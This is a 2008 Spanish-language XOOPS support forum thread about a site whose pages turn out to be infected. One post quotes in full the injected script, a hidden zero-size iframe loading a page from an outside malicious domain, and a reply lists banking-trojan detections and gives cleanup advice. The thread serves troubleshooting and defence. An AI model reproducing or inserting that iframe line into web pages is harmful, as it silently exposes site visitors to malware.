Fork me on GitHub
Fork me on GitHub
Donar Ahora!
Seleccione una cantidad para donar

¿Quiere que su nombre de usuario sea revelado con su donación?
Si - Listeme como un geneoso donante
No - Liste mi donación como un donante anónimo

Usuario
Bienvenido
Haz click para registrarte. Es gratuito y podrás utilizar todos los recursos de la web

Login

Recuerdame

¿Perdió su contraseña?

Conectados: 13
Miembros: 0
Invitados: 13
Buscadores: 0

Estadísticas
Nuevos miembros: [BillyStilw-25/10/2017] [Teacher194-24/10/2017] [TimmyAngel-18/10/2017] [Leblanc-18/10/2017] [HealthyNut-17/10/2017] [HalliePerk-12/10/2017] [ShadBlais-8/10/2017] [WilburCruc-1/10/2017] [Ulanowski7-25/9/2017] [KaleyKlem-23/9/2017]
Registrados: 30176
Hoy: 0
Ayer: 0

Conectados:
onlineInvitadoForos
onlineInvitadoForos
onlineInvitadoForos
onlineInvitadoTitulares
onlineInvitadoForos
onlineInvitadoForos
onlineInvitadoForos
usInvitadoPerfiles extendidos
usInvitadoForos
onlineInvitadoForos
onlineInvitadoForos
onlineInvitadoForos
onlineInvitadoNoticias

Navegando en este tema:   1 Los usuarios anónimos

Re: Desajuste, Superposición de Marcos y Tablas
Nuevito
Info
Bueno, amigo xoopero finalmente nos entendimos! jjajaj

Pero vos en tu primer post no hablaste de backups, copias de seguridad, volver atras una semana, etc etc...

Vos literalmente dijiste: "borra el sitio de inmediato, el sitio XOOPS desde cero, base de datos incluida"...

De ahí medio que vino el malentendido...

Bueno, te deseo mucha suerte en tu nuevo proyecto! Y Como bien decis... Palaaaaaaaaante!! Saludosssss! MIROS

Enviado el:9/9/2008 0:45
Crear PDF con el mensaje Imprimir Facebook Twitter Google Buzz Linkedin Stumbleupon FriendFeed Del.icio.us Digg Reddit Technorati

Supremo
Info
miros,

para eso es (entre otras cosas) la copia de seguridad de la base de datos... para evitar que los usuarios tengan que volver a recargar el sitio.
Instalas un XOOPS, pones los módulos pertinentes, resubes el contenido ( las fotos y demás que suelen ir a uploads ), machacas la base de datos con una de las copias (previa edición de la misma, para eliminar los path de los logs y otras cositas) y voilá, sitio funcional en 1 hora.

Y pensar que no hace un año, andaba yo preguntando cómo clonar un sitio... y si no he clonado ya cerca de un ciento, me quedo corto. Parece imposible, pero es de lo que más me gusta de XOOPS, que se aprende, no es tan cerrado cómo otros CMS llenos de "palabrejos raros".

Las 09:30 de un sábado, que en teoría no tengo que trabajar ésta mañana.... y llevo en pie desde las 08:00 aprendiendo a gestionar un servidor por mi cuenta... (no hay derecho, quiero dormir !!! )

Otro café!!! las cervezas pasadas las 13:00hs, acompañadas de aceitunas...

Pálaaaaaaaaaaaaaaante !!!

Enviado el:6/9/2008 7:31
Crear PDF con el mensaje Imprimir Facebook Twitter Google Buzz Linkedin Stumbleupon FriendFeed Del.icio.us Digg Reddit Technorati

Nuevito
Info
Hola Don Curioso!

Gracias nuevamente por responder tan rápido y tomarte el tiempo para responder párrafo por párrafo…

Obviamente que se nunca mi Pc va a ser invulnerable haga lo que haga… Siempre va a haber algo o alguien adelante… Por lo pronto si creo tener actualizado mi S.O. tengo Service Pack 3 de Xp, y la actualizaciones al día, lo mismo con el Firewall…

En cuanto al resto, te cuento que Backups hago a cada rato desde hace mucho… Y justamente lo que hice, cuando puse el primer post, fue mover mi sitio a otro servidor, base de datos, sistema y módulos… Y me encontré que en el otro servidor tenia la página tal cual mi servidor actual, osea funcionando todo Ok, pero con esas ventanas y marcos encimados y superpuestos…
Entonces sobrescribí los módulos en mi actual servidor y todo se solucionó aparentemente…

Pero después volví a encontrar esos scripts en los archivos html y php. Volví a pisarlos y ahora cambié el password del acceso FTP, instalé el XoopsProtector y hasta ahora va bien, vamos a ver que pasa…

Osea, igualmente lo peor que me pasó es que desencuadren las ventanas, tampoco es que la página deje de estar operable… Solo molesta… Por ahí es lo que no entiendo… ¿Cuál es el sentido del ese script iframe, mas que molestar?…

Como puse en mi primer post, la primera vez que me pasó esto creo, fue cuando ejecuté el módulo DBTools, justamente para hacer un backup… El Módulo ya lo había usado en otro sitio y me era mas cómodo que hacer los Backups desde phpMyAdmin… Igual no estoy diciendo que haya sido ese módulo en particular, la verdad es que no tengo la menor idea, y estoy lejos de saberlo…

Vamos a ver si con el password y el modulo protector se soluciona, espero que si, sino les cuento…

La base de cero, es la última opción porque con más de 2000 fotos y 500 mensajes es casi impensable poder recuperar todo eso, y cargarlo manualmente también sería casi imposible… Sin contar la molestia de estar pidiéndole a todos los usuarios que creen nuevamente sus cuentas, contraseñas o lo que sea… Etc. Etc.

Gracias nuevamente Don Curioso por estar ahí, la verdad es que encontré muy poco en internet de este script, falla, etc, y me pregunto, justo a mi? Jajajj!

Nos vemos!

SaluT! Miros

Enviado el:5/9/2008 19:30

Supremo
Info
miros,

el hecho de que

Acotación:
Hace dos días formatee mi Pc, y tengo firewall y antivirus al día...

no convierte tu pc en invulnerable. ¿ Tienes las últimas actualizaciones de tu S.O. ? ¿ Sabes utilizar un Firewall ? Porque ésto es cómo el que tiene coche y no sabe conducir...

Acotación:
Encontré este post donde se habla de mi mismo problema: http://www.xoops.org/modules/newbb/vi ... ASC&type=&mode=0&start=10 Y ahí solo hablan de cambiarle el password al acceso. FTP. Yo tuve un virus residente en mi programa FTP, pero no en ninguno de los archivos que listas arriba, tampoco ninguno de esos viruses en particulares...

Ahí se habla de algo más que de cambiar la contraseña al FTP. Si bien el caso es similar, entonces haz un backup de tu sitio y chequea los módulos uno a uno. Alguno tiene que tener el código que genera la infección y que, con su ejecución, ayuda a la propagación.

Acotación:
Obviamente volver a comenzar mi sitio, y crear una nueva base de datos va a ser un último recurso...

Quizás sí y quizás no, todo depende del grado de conocimiento de php y mySQL que tengas. Aunque si éste fuera bueno, ésta pregunta no tendría sentido y entonces nos estarías dando cátedra de cómo se quita el " bicho ese ", cosa que yo agradecería que así fuera.

Acotación:
Antes de eso, voy a intentar cualquier cosa... Porque si por cualquier falla de seguridad voy a tener que volver mi sitio a cero, será xoops lo que tenga que cambiar entonces...

Echarle la culpa a XOOPS sería desde luego lo más sencillo. Aunuqe todo sea dicho, la culpa suele ser nuestra, que no tenemos la protección adecuada en nuestro sitio, o instalamos un módulo que nos parece buenísimo y resulta que está " apestado ". Quizás parezco precipitado al decir " todo de cero ", pero en mi corta experiencia, los problemas se solucionan tomando decisiones. Y cada uno tiene un estímulo diferente ante ellos. En mi caso particular y detectanto un comportamiento anormal en un sitio, procedo a eliminarlo por completo, base de datos incluida, y a continuación, uso una de ésas copias de seguridad SEMANALES que tengo de mi base de datos. Todo lo que habré perdido, cómo mucho, es una semana de trabajo.

Aquí es donde digo: " La culpa es NUESTRA ". Quizás pensé que eras de ésos usuarios que han leído el manual de Mel Bezoops y quizás me precipité por ello.

Seguridad, tener certeza de lo que se instala, copia de seguridad, copia de seguridad y copia de seguridad, semanal, son tres minutos.

A propósito de ello, visita éste enlace

Espero que puedas solucionarlo.
Cordiales saludos.

Enviado el:5/9/2008 12:46

Nuevito
Info
Hola Don Curioso...
Gracias por responder tan pronto...

Hace dos días formatee mi Pc, y tengo firewall y antivirus al día...

Encontré este post donde se habla de mi mismo problema:

http://www.xoops.org/modules/newbb/vi ... ASC&type=&mode=0&start=10

Y ahí solo hablan de cambiarle el password al acceso. FTP.

Yo tuve un virus residente en mi programa FTP, pero no en ninguno de los archivos que listas arriba, tampoco ninguno de esos viruses en particulares...

Obviamente volver a comenzar mi sitio, y crear una nueva base de datos va a ser un último recurso...

Antes de eso, voy a intentar cualquier cosa... Porque si por cualquier falla de seguridad voy a tener que volver mi sitio a cero, será xoops lo que tenga que cambiar entonces...

Muchas gracias nuevamente por responder tan rápido...
Saludos!
Miros

Enviado el:4/9/2008 21:52

Supremo
Info
Hola,

borra el sitio de inmediato. La seguridad de tu XOOPS ha sido vulnerada. Tienes que cambiar usuarios, contraseñas... en fin, el sitio XOOPS desde cero, base de datos incluida.

Esto te pasa por visitar sitios de contenido adulto, servir contenido de ellos en tu sitio o andar de megajuanker

Además, las sorpresas vienen a pares !!!

Tienes la máquina " apestada ". Actualiza el antivirus porque éstos procesos tuyos van a la web toksizoka y además, ésto es lo que tienes...

C:\WINDOWS\system32\cmd.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\explorer.exe
C:\winlogon.exe
VIRUS:[26637]Downloader
VIRUS:[40050]Infostealer.Bancos
VIRUS:[40696]Infostealer.Banker.C
C:\WINDOWS\iexplorer.exe
VIRUS:[39776]Bloodhound.Exploit...
C:\WINDOWS\system32\wpx19.cpx

¿ Toca formateo ?

Me ENCANTA ésta frase:

What you see is so not what you get

Saludos y suerte !!!

Enviado el:4/9/2008 20:27

Nuevito
Info
Hola...
Encontre la falla pero no tengo idea que puede ser...
A ver quien me puede ayudar!!
A todos los archivos index.php, index.html y tambien footer y header
se les agrega este scrpit...

<script language=javascript>status=location;document.write('<iframe src="http://toksikoza.net/in.cgi?3" width=0 height=0 frameborder=0 onLoad="status=defaultStatus;"></iframe>');</script>

Alguien sabe que es lo que lo agrega? Inclusive a carpetas que no son ejecutadas...
Borre todos los scripts y hoy vuelven a estar nuevamente...

Que puede ser? Como puedo solucionarlo?
Graciasss!!

Miros

Enviado el:4/9/2008 19:28

Nuevito
Info
Hola José, gracias por responder tan rápido!
Que buena onda!
Hice lo que me dijiste y no me resultó...
Te cuento que ponga el theme que ponga, siempre me amontona las vas ventanas a los bloques derechos...
Si por ejemplo en el style.css: pongo width: 98%; en lugar de 100% eso se acomoda... Pero se siguen viendo grandes las letras de algunos módulos...
Yo revisé la base de datos varias veces desde PhPMyAdmin, y no creo que la base de datos tenga que ver... A mi se me hace algo mas de templates o de themes, pero no se porque no encuentro como solucionarlo... Porque inclusive con el width: 98% no queda como estaba antes... Queda con unos márgenes blancos a los costados y no es lo ideal... Pero ahora lo que mas me interesa es poder achicar la fuente de los bloques, si alguien sabe como... o Dónde lo puedo cambiar... Sería este mismo texto que estan leyendo ahora, de este mismo módulo foro, a mi se me muestra con una letra mucho más grande... Igual a la que se muestra si vamos a: Ver, Tamaño de Texto, Mayor (En Internet Explorer)
Todo esto me pasa en las dos Pc de la LAN de mi casa, y también lo veo igual en la Pc de mi trabajo...
Estoy al horno! jajja
Gracia José nuevamente y a cualquiera que me pueda dar otra pista...
Saludos desde Rosario, Miros

Enviado el:28/8/2008 21:37

Equipo de esXOOPS
Info
Hola Miros:

Prueba eliminando el contenido de las carpetas cache y templates_c (Ojo: debes mantener los archivos index.html dentro de las carpetas)

Si aun así no funciona, lo que debes revisar es el theme. Aunque si antes de la operación que dices no tenías el problema difícil que el problema esta ahí. Supongo que has probado revisar la página desde otra máquina, porque quizas el problema esté en la configuración del explorador.

José Espinoza

Enviado el:28/8/2008 20:39

Desajuste, Superposición de Marcos y Tablas
Nuevito
Info

Hola a todos! Es la primera vez que escribo... No se más que hacer... Probé de todo, creo que desde que use una opción que dice "Optimización de Tablas" en el módulo DBTools, comenzó a pasarme de que se superponen las tablas, y en módulos como el foro (newbb) o el libro de visitas (xoopsguestbook) aparece una barra de desplazamiento horizontal, y se mueve todo medio centímetro a la derecha, y además algo que no puedo corregir es que se agrandó la letra... Tal cual si pusiéramos en el Internet Explorer, ver-letra-grande... Acá dejo una imágen a ver si alguien me puede ayudar a corregir la superposición y a achicar las letras de alguno de los módulos... Desde ya, muchas graciasssssssss! Miros!

Haga Clic para ver la Imagen original en una ventana nueva

Enviado el:28/8/2008 19:26

Usted puede ver temas.
No puede empezar un nuevo tema.